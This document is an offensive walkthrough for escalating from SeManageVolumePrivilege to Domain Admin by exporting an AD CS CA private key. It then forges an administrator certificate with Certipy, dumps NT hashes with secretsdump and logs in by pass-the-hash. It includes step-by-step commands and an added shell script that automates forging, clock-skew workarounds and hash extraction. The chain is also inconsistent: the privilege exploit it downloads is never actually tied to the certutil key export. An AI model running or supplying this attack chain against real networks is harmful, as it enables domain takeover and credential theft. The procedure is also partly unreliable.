Abusing the SeManageVolumePrivilege
SeManageVolumePrivilege ("Perform volume maintenance tasks") lets a low-privileged user perform raw volume access on the system disk, and most write-ups use it for LSASS dumping. A stealthier and far more damaging use is to pull the Active Directory Certificate Services (AD CS) CA private key straight off the disk, forge a certificate for a domain administrator with it, and escalate to full control of the domain.
Requirements
- Current user must hold SeManageVolumePrivilege (check with whoami /priv).
- Target system must be a Certificate Authority, or otherwise hold the CA's certificate material and .pfx files (for example under C:\Windows\System32\certsrv\certenroll).
Tools
- SeManageVolumeExploit.exe: abuses the privilege to read raw volume data
  https://github.com/CsEnox/SeManageVolumeExploit
- certutil: native Windows tool, used here to export the CA certificate together with its private key
- Certipy: forges certificates with the extracted CA key and authenticates with them
  https://github.com/ly4k/Certipy
Steps
1. Confirm the privilege:
whoami /priv
Make sure SeManageVolumePrivilege is listed and its state is Enabled.
2. Download the exploit and upload it to the target
wget https://github.com/CsEnox/SeManageVolumeExploit/releases/download/public/SeManageVolumeExploit.exe
Upload it to the target with Evil-WinRM (upload), SMB, or any other transfer method, and execute it there.
3. Search for certificates
The CA publishes its material under C:\Windows\System32\certsrv\certenroll. Look for .pfx, .crt and .crl files:
dir C:\Windows\System32\certsrv\certenroll
Example output:
certificate-LTD-CA.crl
certificate-LTD-CA+.crl
Certificate-LTD-CA.crt
The .crt and .crl files here are public (the CA certificate and its CRLs), so they are not the prize themselves; what they give you is the CA's name (Certificate-LTD-CA), which identifies the certificate in the machine's personal (my) store where the private key is exported from in the next step.
4. Export the CA certificate with its private key
Use certutil against the machine's personal (my) store:
certutil -exportPFX my "Certificate-LTD-CA" C:\users\youruser\desktop\ca.pfx
- Enter a password when prompted; it protects the .pfx and you will need it again when Certipy loads the file.
- Download the file to your attack box.
5. Forge an administrator certificate
certipy-ad forge -ca-pfx ca.pfx -upn administrator@corp.local
Certipy signs a new certificate for the given UPN with the stolen CA key and writes it to:
administrator_forged.pfx
6. Authenticate as Domain Admin with the certificate
timewrap corp.local certipy-ad auth -pfx administrator_forged.pfx -domain corp.local -dc-ip 10.10.10.10
timewrap is my custom bash script; it works the same way as faketime. timewrap corp.local fetches the domain's current time and runs the command under faketime with that time, because Kerberos rejects requests whose clock is too far from the KDC's (KRB_AP_ERR_SKEW).
- This uses PKINIT (smartcard-style authentication) against the DC.
- It obtains a TGT and saves it as administrator.ccache; Certipy also prints the account's NT hash.
7. Dump the Administrator NT hash
certipy-ad auth already prints the NT hash for the forged identity (the Got hash for 'administrator@corp.local' line in the previous step's output). Alternatively, reuse the saved .ccache with Impacket:
export KRB5CCNAME=administrator.ccache
impacket-secretsdump -k -no-pass corp.local/administrator@DC01.corp.local
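The attack-box half of steps 5 to 7, as an added example: this is editor's code, not the author's timewrap script and not part of Certipy. It queries the DC's clock with ntpdate, runs Certipy under libfaketime with that offset so PKINIT does not fail on clock skew, forges the certificate, and parses the NT hash out of Certipy's output. It assumes ntpdate, faketime and certipy-ad are on the path and that certipy-ad forge accepts -out; the DC IP, domain, UPN and ca.pfx name are the placeholders used above.

```shell
#!/bin/sh
# Added example (editor's code): attack-box side of the procedure above.
# Assumes ntpdate, libfaketime (faketime) and certipy-ad are installed and
# that `certipy-ad forge` accepts -out. DC IP, domain and pfx names are the
# placeholders used in the write-up.
set -eu

# Turn the output of `ntpdate -q <dc>` into a libfaketime relative offset such
# as "+178s" or "-42s" (whole seconds; Kerberos only needs us within 5 minutes).
# Returns 1 when no "offset" field is present (e.g. the DC did not answer NTP).
kdc_offset_from_ntpdate() {
  off=$(printf '%s\n' "$1" | sed -n 's/.*offset \([-+]*[0-9]*\).*/\1/p' | head -n 1)
  [ -n "$off" ] || return 1
  case "$off" in
    -*|+*) ;;
    *) off="+$off" ;;   # no sign printed: treat as a positive offset
  esac
  printf '%ss\n' "$off"
}

# Pull the NT hash out of Certipy's "[*] Got hash for '<upn>': <LM>:<NT>" line.
nt_hash_from_certipy_output() {
  h=$(printf '%s\n' "$1" \
      | sed -n "s/.*Got hash for '[^']*': [0-9a-fA-F]\{32\}:\([0-9a-fA-F]\{32\}\).*/\1/p" \
      | head -n 1)
  [ -n "$h" ] || return 1
  printf '%s\n' "$h"
}

# Run a command with our clock shifted onto the DC's clock (the same idea as the
# author's timewrap): query the DC over NTP, then wrap the command in faketime.
run_with_kdc_time() {
  dc="$1"; shift
  ntp_out=$(ntpdate -q "$dc" 2>&1) || { echo "[-] NTP query to $dc failed: $ntp_out" >&2; return 1; }
  off=$(kdc_offset_from_ntpdate "$ntp_out") || { echo "[-] no offset in ntpdate output" >&2; return 1; }
  echo "[*] clock offset to $dc: $off" >&2
  faketime -f "$off" "$@"
}

# Forge a certificate for <upn> with the stolen CA key, authenticate with it via
# PKINIT and print the NT hash.
# Usage: forge_and_auth ca.pfx administrator@corp.local corp.local 10.10.10.10
forge_and_auth() {
  ca_pfx="$1"; upn="$2"; domain="$3"; dc="$4"
  user=${upn%%@*}
  forged="${user}_forged.pfx"
  certipy-ad forge -ca-pfx "$ca_pfx" -upn "$upn" -out "$forged"
  if ! auth_out=$(run_with_kdc_time "$dc" certipy-ad auth -pfx "$forged" -domain "$domain" -dc-ip "$dc" 2>&1); then
    printf '%s\n' "$auth_out" >&2
    echo "[-] certipy auth failed; check for a clock-skew (KRB_AP_ERR_SKEW) message above" >&2
    return 1
  fi
  printf '%s\n' "$auth_out" >&2
  nt=$(nt_hash_from_certipy_output "$auth_out") || { echo "[-] Certipy printed no hash" >&2; return 1; }
  echo "[+] NT hash for $upn: $nt"
  echo "[+] TGT saved by Certipy as ${user}.ccache (export KRB5CCNAME=${user}.ccache for Impacket)"
}

# Only run when invoked directly with four arguments; sourcing the file just
# defines the functions.
if [ $# -eq 4 ]; then
  forge_and_auth "$@"
fi
```

The two parsing helpers are kept separate from the network calls so they can be checked offline against constructed ntpdate and Certipy output; the offset is truncated to whole seconds, which is more than enough precision for Kerberos' five-minute skew window.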
Result
- You now hold the Administrator NT hash (and a TGT in administrator.ccache).
- Log in with evil-winrm using pass-the-hash, or keep dumping secrets.
evil-winrm -i 10.10.10.10 -u administrator -H <ntlm_hash>
Impact
- Stealthy: no LSASS access or injection on the target
- Works post-exploitation on a CA server
- Full Domain Admin access without knowing any password
Summary
| Step | Action |
|---|---|
| Have SeManageVolumePrivilege | Allows raw disk access |
| Locate CA cert + export | Export .pfx from system volume |
| Forge cert via Certipy | Become admin with valid certificate |
| PKINIT auth & NTLM hash | Gain full DA access |